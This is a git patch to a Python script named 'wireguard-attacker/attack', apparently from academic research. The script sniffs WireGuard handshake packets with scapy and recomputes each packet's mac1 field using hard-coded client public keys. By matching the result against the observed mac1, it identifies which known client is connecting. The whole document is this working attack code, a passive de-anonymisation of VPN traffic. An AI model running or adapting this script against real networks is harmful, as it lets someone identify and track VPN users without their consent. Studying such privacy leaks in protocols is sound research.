From 0bcf19ac7cc109fb1f8710205cca318ace61092b Mon Sep 17 00:00:00 2001
From: Boris LONJON <boris.lonjon@limos.fr>
Date: Thu, 18 Jan 2024 12:09:41 +0100
Subject: [PATCH] Working script

---
 wireguard-attacker/attack | 133 +++++++++++++++++++++-----------------
 1 file changed, 73 insertions(+), 60 deletions(-)

diff --git a/wireguard-attacker/attack b/wireguard-attacker/attack
index dad3e24..906ed92 100755
--- a/wireguard-attacker/attack
+++ b/wireguard-attacker/attack
@@ -1,68 +1,81 @@
 #!/usr/bin/env python
-
-from pprint import pprint
-from hashlib import blake2b
+import signal
+import sys
+import hashlib
+from base64 import b64decode
 from scapy.all import sniff, IP, UDP, Raw
 from binascii import hexlify
-from pprint import pprint
-# import subprocess
 
+MAC_LABEL_CONST = 'mac1----'.encode('utf-8')
 CLIENT_1_PUBKEY = '85Ey6fLDcFadWd+MRPHAuBEAHJ6MIUbl2jNsCZJXmRI='
 CLIENT_2_PUBKEY = 'gtPyxcaZzC7LkLq/QGzvVLEHaIOfdJ6nb79wx8C7YT8='
-SERVER_PUBKEY = '+O7mAJK0m7Ts62WuP1Et1/RanAq5yFPAgDxuyR9TtD4='
+
+
+def signal_handler(sig, frame):
+    print('You pressed Ctrl+C!\n Exiting')
+    sys.exit(0)
 
 def split_packet(data):
-    # if UDP in packet and Raw in packet:
-    #     udp_payload = packet[UDP].payload
-    #     if len(udp_payload) >= 32:  # Ensure there's enough data for the WireGuard handshake
-            # data = bytes(udp_payload)
-            if data[0] == 1:
-                return {
-                    'type':         data[0],
-                    'reserved':     hexlify(data[1:4]),
-                    'sender':       hexlify(data[4:8]),
-                    'ephemeral':    hexlify(data[8:40]),
-                    'enc_static':   hexlify(data[40:88]),
-                    'enc_ts':       hexlify(data[88:116]),
-                    'mac1':         hexlify(data[116:132]),
-                    'mac2':         hexlify(data[132:148])
-                }
-            if data[0] == 2:
-                return {
-                    'type':         data[0],
-                    'reserved':     hexlify(data[1:4]),
-                    'sender':       hexlify(data[4:8]),
-                    'ephemeral':    hexlify(data[8:40]),
-                    'enc_static':   hexlify(data[40:88]),
-                    'enc_ts':       hexlify(data[88:116]),
-                    'mac1':         hexlify(data[116:132]),
-                    'mac2':         hexlify(data[132:148])
-                }
-
-            #     # Extract mac1 (last 32 bytes of the UDP payload)
-            #     hex_udp_payload = hexlify(bytes(udp_payload)[-32:-16])
-            #     mac1 = hex_udp_payload
-            #     return mac1.decode('utf-8')
-    # return None
-
-
-# Set the network interface to promiscuous mode using subprocess
-interface = "eth1"
-# subprocess.run(["sudo", "ifconfig", interface, "promisc"])
-
-packets = []
-sniff(iface=interface, filter="udp and port 51820", lfilter=lambda packet: bytes(packet[UDP].payload)[0] == 1 or bytes(packet[UDP].payload)[0] == 2, prn=lambda packet: packets.append(bytes(packet[UDP].payload)), count=2)
-
-
-handshake = split_packet(packets[0])
-response = split_packet(packets[1])
-
-
-print('Handshake:')
-print('U=' + str(handshake['enc_static']))
-print('mac1=' + str(handshake['mac1']))
-
-print()
-print('Response:')
-print('U=' + str(response['enc_static']))
-print('mac1=' + str(response['mac1']))
\ No newline at end of file
+    if data[0] == 1:
+        return {
+            'type':         data[0],
+            'reserved':     data[1:4],
+            'sender':       data[4:8],
+            'ephemeral':    data[8:40],
+            'enc_static':   data[40:88],
+            'enc_ts':       data[88:116],
+            'mac1':         data[116:132],
+            'mac2':         data[132:148],
+        }
+    if data[0] == 2:
+        return {
+            'type':         data[0],
+            'reserved':     data[1:4],
+            'sender':       data[4:8],
+            'receiver':     data[8:12],
+            'ephemeral':    data[12:44],
+            'enc_empty':    data[44:60],
+            'mac1':         data[60:76],
+            'mac2':         data[76:92],
+            'remaining':    data[0:60]
+        }
+
+def compute_mac(client_pubkey, packet):
+
+    pubkey = b64decode(client_pubkey)
+
+    items = MAC_LABEL_CONST + pubkey
+    fingerprint = hashlib.blake2s(items, digest_size=32)
+    mac = hashlib.blake2s(packet, key=fingerprint.digest(), digest_size=16)
+
+    return mac
+
+
+def listen():
+
+    interface = "eth1"
+
+    packets = []
+    sniff(iface=interface, filter="udp and port 51820", lfilter=lambda packet: bytes(packet[UDP].payload)[0] == 1 or bytes(packet[UDP].payload)[0] == 2, prn=lambda packet: packets.append(bytes(packet[UDP].payload)), count=2)
+
+    initialization = split_packet(packets[0])
+    response = split_packet(packets[1])
+
+    return (initialization, response)
+
+signal.signal(signal.SIGINT, signal_handler)
+
+print("Press Ctrl+C to exit program\n")
+
+while True:
+
+    packets = listen()
+    response = packets[1]
+
+    c_mac1 = compute_mac(CLIENT_1_PUBKEY, response['remaining'])
+    c_mac2 = compute_mac(CLIENT_2_PUBKEY, response['remaining'])
+
+    print()
+    print('observed mac1 = ' + hexlify(response['mac1']).decode('utf-8'))
+    print("computed mac1 client1 = " + c_mac1.hexdigest())
+    print("computed mac1 client2 = " + c_mac2.hexdigest())
-- 
GitLab